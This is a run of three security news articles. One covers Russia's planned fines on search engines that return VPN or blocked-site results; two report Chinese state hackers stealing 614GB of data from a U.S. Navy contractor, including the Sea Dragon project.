The Russian Government has approved a new bill to punish search engines that are not aligned with Moscow’s rules and that allow their users to find VPN services and anonymization tools used to circumvent censorship.

According to the amendments to the Code of Administrative Offenses of the Russian Federation, the Duma will also impose fines on search engines if they continue to return results for domains listed in the up-to-date database of blocked domains.

Fines for individuals will range between 3,000 and 5,000 rubles (roughly $48 to $80), while officials will face fines up to 50,000 rubles (roughly $800), and legal entities will face fines between 500,000 and 700,000 rubles (roughly $8,019 to $11,227).

“The failure of the operator to perform the search system to connect to this system “entails the imposition of an administrative fine on citizens in the amount of three thousand to five thousand rubles; on officials – from thirty thousand to fifty thousand rubles; on legal entities – from five hundred thousand to seven hundred thousand rubles, “- reads the press release published by the Duma.

Russians ordinarily use VPN services and other anonymizing services to access blocked content and bypass censorship; the following graph shows the continuous growth in the number of Tor users in Russia.

(Graph: number of Tor users in Russia)

In 2017, Russia’s parliament voted to ban web tools that could be used by people to surf outlawed websites, and the Duma approved the proposed bill to oblige anyone using an online message service to identify themselves with a telephone number.

The bill prohibited the use of any service from the Russian territory if they could be used to access blacklisted websites.

VPN operators and proxy services operating in the country must register themselves with the Government regulatory authority.

Since May 3rd, 2018, Russia’s media and communication regulatory authority Roskomnadzor has blocked over 50 virtual private networks (VPNs), Web Proxies and Anonymizing networks.

However, many VPNs and Internet proxy services still haven’t complied with the country’s law by registering themselves; for this reason, Moscow introduced fines for search engines.

The Russian communications watchdog Roskomnadzor will also provide a Federal State Information System (FGIS) containing the list of banned websites and services in the country, and search engines will need to update the results they provide by connecting to FGIS.

Search engines have 30 days to be aligned with Federal State Information System (FGIS) if the service providers

Those who fail to connect to this system will also face fines similar to those detailed above.

In May, the Anonymous collective hacked and defaced a subdomain of Russia’s Federal Agency for International Cooperation (Rossotrudnichestvo) site to protest against government censorship, with a specific reference to the ban on Telegram.

Chinese state-sponsored hackers steal 600GB U.S. Navy data
9.6.18 securityaffairs BigBrothers 

According to a report published by The Washington Post, Chinese hackers have stolen a huge trove of sensitive data from a U.S. Navy contractor.
China-linked hackers have stolen a huge trove of sensitive data from a U.S. Navy contractor, the Washington Post reported Friday. The threat actors stole more than 614 gigabytes of data including secret plans to develop a new type of submarine-launched anti-ship missile.

The Washington Post was informed by government officials that spoke on the condition of anonymity.

According to the Washington Post, the security breach took place in January and February; the hackers belong to a division of the Chinese Ministry of State Security, operating out of the Chinese province of Guangdong.

The report published by the media outlet doesn’t reveal the name of the U.S. Navy contractor; it only reports that the contractor works for the Naval Undersea Warfare Center, based in Newport, Rhode Island.

“Chinese government hackers have compromised the computers of a Navy contractor, stealing massive amounts of highly sensitive data related to undersea warfare — including secret plans to develop a supersonic anti-ship missile for use on U.S. submarines by 2020, according to American officials.” states the report published by the Washington Post.

“The hackers targeted a contractor who works for the Naval Undersea Warfare Center, a military organization headquartered in Newport, R.I., that conducts research and development for submarines and underwater weaponry.”

Stolen data included unclassified information relating to submarine cryptographic systems, signals and sensor data, and a project called Sea Dragon.

The project Sea Dragon was launched by the Pentagon to extend existing US military technologies for new applications, the US Government already spent more than $300 million for the initiative since 2015.

“The Defense Department, citing classification levels, has released little information about Sea Dragon other than to say that it will introduce a “disruptive offensive capability” by “integrating an existing weapon system with an existing Navy platform.” continues the post.

“The Pentagon has requested or used more than $300 million for the project since late 2015 and has said it plans to start underwater testing by September.”


At the time, the U.S. Navy did not comment on the incident for security reasons.

“There are measures in place that require companies to notify the government when a ‘cyber incident’ has occurred that has actual or potential adverse effects on their networks that contain controlled unclassified information,” said Cmdr. Bill Speaks, a U.S. Navy spokesman, adding that “it would be inappropriate to discuss further details at this time.”

“Evolving cyber threats are serious matters and we are continuously bolstering our cybersecurity culture by focusing on awareness of the cyber threat, and the adequacy of our cyber defenses and information technology capabilities,” he told AFP.

This incident is only the latest in a series: in the past, Chinese hackers have already stolen sensitive information from the US military, such as the blueprints of the F-35 stealth fighter, the advanced Patriot PAC-3 missile system, and other highly secret projects.

Chinese Government Hackers Steal Trove of U.S. Navy Data: Report

9.6.18 securityweek BigBrothers

Chinese government hackers have stolen a massive trove of sensitive information from a US Navy contractor, including secret plans to develop a new type of submarine-launched anti-ship missile, the Washington Post reported Friday.

Investigators told the newspaper that breaches were executed in January and February by a division of the Chinese Ministry of State Security, operating out of the Chinese province of Guangdong.

The contractor, which was not named in the report, works for the Naval Undersea Warfare Center, based in Newport, Rhode Island. It conducts research and development for submarines and underwater weapons systems.

According to the Post, hackers swiped 614 gigabytes of data that included information relating to sensors, submarine cryptographic systems and a little-known project called Sea Dragon.

The Pentagon has not said much about Sea Dragon, launched in 2012, except that it is aimed at adapting existing military technologies to new uses.

At the Navy's request, the Post withheld information about the compromised new missile system, but said it was for a supersonic anti-ship missile that could be launched from submarines.

Navy spokesman Commander Bill Speaks declined to confirm the Post report, citing security reasons.

"Evolving cyber threats are serious matters and we are continuously bolstering our cybersecurity culture by focusing on awareness of the cyber threat, and the adequacy of our cyber defenses and information technology capabilities," he told AFP.

Chinese hackers have for years targeted the US military to steal information and the Pentagon says they have previously swiped crucial data on the new F-35 stealth fighter, the advanced Patriot PAC-3 missile system and other highly sensitive projects.

News of the hack comes amid rising tensions between Beijing and Washington on a range of issues including trade and military matters.

The Pentagon last month pulled its invitation for China to join maritime exercises in the Pacific because of Beijing's "continued militarization" of the South China Sea.